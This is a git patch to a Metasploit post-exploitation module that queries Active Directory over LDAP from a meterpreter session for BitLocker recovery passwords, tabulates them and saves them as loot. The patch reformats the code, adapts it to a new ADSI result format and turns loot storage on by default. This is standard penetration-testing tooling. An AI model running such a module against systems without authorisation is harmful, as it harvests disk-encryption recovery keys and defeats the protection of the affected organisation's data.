From 7e5b03c44ef1884ab95da34ac5c523337210b33c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 29 Apr 2015 09:48:44 +0100
Subject: [PATCH] Tidyup and update for new ADSI format

---
 .../post/windows/gather/enum_ad_bitlocker.rb  | 67 ++++++++-----------
 1 file changed, 28 insertions(+), 39 deletions(-)

diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
index 1afa686ad1..7dd102d0c6 100644
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -8,69 +8,60 @@ require 'msf/core'
 require 'msf/core/auxiliary/report'
 
 class Metasploit3 < Msf::Post
-
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::LDAP
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'	       => 'Windows Gather Active Directory Bitlocker Recovery',
-        'Description'  => %Q{
-            This module will enumerate bitlocker reocvery passwords in the default AD
-            directory. Requires Domain Admin or other delegated privileges.
-        },
-        'License'      => MSF_LICENSE,
-        'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
-        'Platform'     => [ 'win' ],
-        'SessionTypes' => [ 'meterpreter' ],
-        'References'   =>
-        [
-          ['URL', 'tbc'],
-        ]
-      ))
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Windows Gather Active Directory Bitlocker Recovery',
+      'Description'  => %(
+          This module will enumerate bitlocker reocvery passwords in the default AD
+          directory. Requires Domain Admin or other delegated privileges.
+                              ),
+      'License'      => MSF_LICENSE,
+      'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
+      'Platform'     => [ 'win' ],
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   =>
+      [
+        ['URL', 'https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx']
+      ]
+    ))
 
     register_options([
-      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
       OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
       OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])
     ], self.class)
   end
 
   def run
-    fields = datastore['FIELDS'].gsub(/\s+/,"").split(',')
+    fields = datastore['FIELDS'].gsub(/\s+/, "").split(',')
     search_filter = datastore['FILTER']
     max_search = datastore['MAX_SEARCH']
     q = query(search_filter, max_search, fields)
 
-    if q.nil? or q[:results].empty?
+    if q.nil? || q[:results].empty?
+      print_status('No results found...')
       return
     end
 
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
-        'Header'     => "Bitlocker Recovery Passwords",
-        'Indent'     => 1,
-        'SortIndex'  => -1,
-        'Columns'    => fields
-      )
+      'Header'     => 'Bitlocker Recovery Passwords',
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => fields
+    )
 
-    # Reports are collections for easy database insertion
-    reports = []
     q[:results].each do |result|
       row = []
 
-      report = {}
-      0.upto(fields.length-1) do |i|
-        if result[i].nil?
-          field = ""
-        else
-          field = result[i]
-        end
-
-        row << field
+      result.each do |field|
+        field_value = (field.nil? ? '' : field[:value])
+        row << field_value
       end
 
-      reports << report
       results_table << row
     end
 
@@ -80,6 +71,4 @@ class Metasploit3 < Msf::Post
       print_status("Results saved to: #{stored_path}")
     end
   end
-
 end
-